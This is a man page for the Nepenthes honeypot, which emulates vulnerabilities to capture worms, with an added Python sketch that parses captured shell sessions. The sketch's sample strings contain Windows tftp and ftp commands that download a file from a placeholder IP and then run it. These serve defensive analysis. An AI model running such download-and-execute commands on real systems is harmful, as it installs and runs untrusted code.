Manual Reference Pages  -  NEPENTHES (8)

NAME

nepenthes - finest collection -

CONTENTS

Synopsis
Description
Options
Examples
Files
Bugs
See Also

SYNOPSIS

nepenthes [OPTIONS]
nepenthes [OPTIONS] [PATH]
 

DESCRIPTION

By emulating widespread vulnerabilities, Nepenthes is able to catch and store worms that use these vulnerabilities. Furthermore, you can determine the malware activity on a network by deploying a nepenthes sensor. The program emulates different well-known vulnerabilities and waits for malicious connections that try to exploit them. If a connection tries to exploit something, nepenthes tries to guess which exploit is going to be used. There are several different ways an exploitation can happen; the attacker can ask nepenthes to

* connect to a provided IP and port, offering a shell there (connectback)
* bind a shell on a port (bindshell)
* directly execute a shell command
* provide a URL from which to download a file and execute the file
* use specific file transfer mechanisms to transfer the file (link, blink, mydoom ...)

If a shell is expected, either a bindshell or a connectback shell, nepenthes will offer this shell to the attacker and fulfill the requested actions. In most cases there are two ways worms try to spread themselves using a shell:

tftp - trivial file transfer protocol, using tftp.exe in Microsoft Windows.
ftp - file transfer protocol, using ftp.exe in Microsoft Windows.

Nepenthes will parse the shell instructions and try to download the file; upon success the file will be stored.
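
The shell-instruction parsing described above, as an added sketch for analysts reviewing captured sessions (not Nepenthes' own code, which this page does not show). It assumes the tftp.exe form "tftp -i HOST GET FILE" and an ftp.exe script assembled with echo redirections; the function name, sample sessions and addresses are constructed.

```python
import re

# Windows tftp.exe form: tftp [-i] HOST GET SOURCE [DESTINATION]
TFTP_RE = re.compile(r"\btftp(?:\.exe)?\s+(?:-i\s+)?(\S+)\s+get\s+(\S+)", re.I)
# ftp.exe is usually driven by a script built line by line: echo CMD >> file
ECHO_RE = re.compile(r"\becho\s+(.*?)\s*>>?\s*\S+$", re.I)

# Constructed sample sessions (documentation address ranges, made-up names)
SAMPLE_TFTP = "cmd /c tftp -i 192.0.2.10 GET sample.exe & sample.exe"
SAMPLE_FTP = ("echo open 198.51.100.7 2121 > o & echo user a b >> o & "
              "echo get sample2.exe >> o & ftp -n -s:o & sample2.exe")


def parse_shell_session(session):
    """Return the download requests found in a captured shell command line.

    Each result is a dict with protocol, host, port and file. Commands are
    only parsed, never executed.
    """
    found = []
    ftp = {}  # host/port remembered from the most recent "open" line
    # cmd.exe chains commands with & or &&; sessions may also span lines
    for cmd in re.split(r"&&?|\r?\n", session):
        cmd = cmd.strip()
        m = TFTP_RE.search(cmd)
        if m:
            found.append({"protocol": "tftp", "host": m.group(1),
                          "port": 69, "file": m.group(2)})
            continue
        m = ECHO_RE.search(cmd)
        if not m:
            continue  # not part of an ftp script (e.g. running the payload)
        words = m.group(1).split()
        verb = words[0].lower() if words else ""
        if verb == "open" and len(words) >= 2:
            has_port = len(words) > 2 and words[2].isdigit()
            ftp = {"host": words[1], "port": int(words[2]) if has_port else 21}
        elif verb == "get" and len(words) >= 2 and "host" in ftp:
            found.append({"protocol": "ftp", "host": ftp["host"],
                          "port": ftp["port"], "file": words[1]})
    return found


if __name__ == "__main__":
    for sample in (SAMPLE_TFTP, SAMPLE_FTP):
        print(parse_shell_session(sample))
```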

OPTIONS

-c PATH, --config=PATH
  PATH to nepenthes.conf
-d PATTERN, --disk-log=PATTERN
  apply filter to disk logging. PATTERN can consist of crit, warn, info, debug and spam; combine tags using commas.
-f OPTIONS PATH, --file-check=OPTIONS PATH
  Use Nepenthes to check if a file or a directory of files in PATH contains known shellcodes. PATH can be a directory or multiple files. OPTIONS can be rmknown,rmnonop,nothing.
-h, --help
  show help
-H, --large-help
  show help with default values
-i, --info
  how to contact us
-k, --check-config
  check nepenthes.conf config for syntax errors
-l PATTERN, --log=PATTERN
  apply filter to console logging. PATTERN can consist of crit, warn, info, debug and spam; combine tags using commas.
-L, --logging-help
  display help for -d and -l
-o, --no-color
  log without colors to console (does not work yet).
-r PATH, --chroot=PATH
  chroot to PATH
-R, --ringlog
  use ringlogger instead of filelogger
-u USER, --user=USER
  switch the user the process runs as; USER must be a user's name.
-g GROUP, --group=GROUP
  switch the process group; GROUP must be a group's name.
-v, --version
  show version
-w, --workingdir
  where shall the process live

EXAMPLES

nepenthes -d crit,warn,info
  start nepenthes and log only messages with loglevel critical, warning and info to disk
nepenthes -u marshall -g mother
  start nepenthes and change to user marshall and group mother.
nepenthes -r /opt/nepenthes
  start nepenthes and chroot to /opt/nepenthes
nepenthes -u marshall -g mother -r /opt/nepenthes
  start nepenthes and change to user marshall and group mother and chroot to /opt/nepenthes
nepenthes -f rmknown,rmnonop,dononp /opt/nepenthes/var/hexdumps/
  check the directory /opt/nepenthes/var/hexdumps for known shellcodes, remove known shellcodes, remove shellcodes without nop slide, check shellcodes without nopslide.
nepenthes -f nothing /tmp/*.bin /tmp/unknown_shellcodes/
  check the files in the directory /tmp/unknown_shellcodes/ and the files matching /tmp/*.bin for known shellcodes, do nothing.

FILES

etc/nepenthes/nepenthes.conf
  nepenthes configuration file
lib/nepenthes/
  nepenthes modules
etc/nepenthes/
  nepenthes modules configuration files

BUGS

this manual is a pain
 

SEE ALSO

nepenthes.conf(5)

nepenthes 0.1.3 NEPENTHES (8) 2005-11-18